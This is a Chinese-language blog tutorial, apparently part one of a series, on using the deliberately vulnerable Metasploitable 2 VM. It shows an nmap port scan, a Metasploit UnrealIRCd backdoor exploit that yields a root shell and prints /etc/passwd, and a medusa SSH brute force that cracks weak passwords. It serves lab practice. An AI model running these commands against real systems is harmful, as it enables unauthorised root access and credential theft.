Metasploitable 2 漏洞演练系统使用指南(上)
废话不多说,马上进入正题( ̄▽ ̄):
系统简介:
Metasploitable是一个虚拟机文件,从网上下载解压之后就可以直接使用,无需安装。Metasploitable基于Ubuntu Linux,由于基于Ubuntu,用起来十分得心应手。Metasploitbale建立的初衷,其实就是为了测试一下本家的MSF漏洞框架集工具,所以,它的内核是2.6.24,而且一般在Liunx会产生问题的服务、工具或者软件它都集齐了(请看下文…)。版本2添加了更多的漏洞,而且更让人兴奋的是,系统搭载了DVWA、Mutillidae等Web漏洞演练平台。什么?不懂这是什么?请查看:http://www.2cto.com/Article/201306/216233.html 脑补<( ̄) ̄)>……
如何开始
虚拟机设置完毕后, 就可以登录Metasploitable啦,用户名是 :msfadmin 密码是: msfadmin. 在shell中执行ifconfig命令来查看你的IP 地址.
msfadmin@metasploitable:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1
inet addr:192.168.99.131 Bcast:192.168.99.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
开启的服务
开启网络之后,我们就可以在我们的攻击主机(类似BackTrack或是Kali)开始我们的渗透之旅了, 渗透的第一步当然是识别出那些端口和服务是开放着啦。在我们用神器Nmap扫描过后,我们可以发现Metasploitable开放着一些众多端口:
root@ubuntu:~# nmap -p0-65535 192.168.99.131
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2013-05-29 21:14 PDT
Nmap scan report for 192.168.99.131
Host is up (0.00028s latency).
Not shown: 65506 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
6697/tcp open unknown
8009/tcp open ajp13
8180/tcp open unknown
8787/tcp open unknown
39292/tcp open unknown
43729/tcp open unknown
44813/tcp open unknown
55852/tcp open unknown
MAC Address: 00:0C:29:9A:52:C1 (VMware)
呵呵,如果在真实情况下看到目标机开这么多端口,是不是做梦都会笑醒捏~( ̄▽ ̄)~*
实例演示:
举个栗子,在6667端口, Metasploitable运行着 UnreaIRCD IRC 后台守护程序,这个版本存在一个自动向其他正在监听状态中的端口发送一个紧跟“AB”信件的系统命令的漏洞(国外文章翻译,我也不知它在讲个什么杰宝~~~<( ̄) ̄)>)
./msfconsole
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse double handler
[*] Connected to 192.168.99.131:6667…
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
[*] Sending backdoor command…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo 8bMUYsfmGvOLHBxe;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “8bMUYsfmGvOLHBxe\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700
id
uid=0(root) gid=0(root)
cat /etc/passwd | grep root
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9ELid.:14747:0:99999:7:::
小手一抖,权限我有!
暴力破解弱口令:
为了增加可玩性, Metasploit2 的密码强度设置十分糟糕,从系统账号到数据库账号 除了一个密码和账户名相同(msfadmin)的账号 ,它的系统还存在下表所示的弱密码,真是弱爆了啊. 而且ssh也无加密呀,利用medusa工具暴力破解ssh,即可快速暴力破解。
root@bt :/medusa –h 192.168.235.12 –U /home/test/user.txt –P /home/test/word.txt –M ssh
很轻松就跑出了下面的密码
ACCOUNT FOUND : [ssh] host:192.168.235.12 User:user Password:user [SUCCEED]
ACCOUNT FOUND : [ssh] host:192.168.235.12 User:msfadmin Password:msfadmin [SUCCEED]
ACCOUNT FOUND : [ssh] host:192.168.235.12 User:klog Password:123456789 [SUCCEED]
Metasploitable官方专栏:http://www.offensive-security.com/metasploit-unleashed/Metasploitable
Metasploitable下载地址:http://sourceforge.net/projects/metasploitable/files/Metasploitable2
本来还有一个ssh远程溢出提权的,但是昨晚弄到吐血也没搞出来,不解不解~~~
好!今天的内容就到这里,下次还会继续介绍Metasploitable的几个实战栗子,请大家继续关注不要错过yoooooooooooooo~~~~~~~~~~~
本文来自: 网络安全攻防研究室(www.91ri.org) 请尊重作者,转载时带上版权信息。 详细内容请参考:http://www.91ri.org/6138.html
上一篇: java 匿名内部类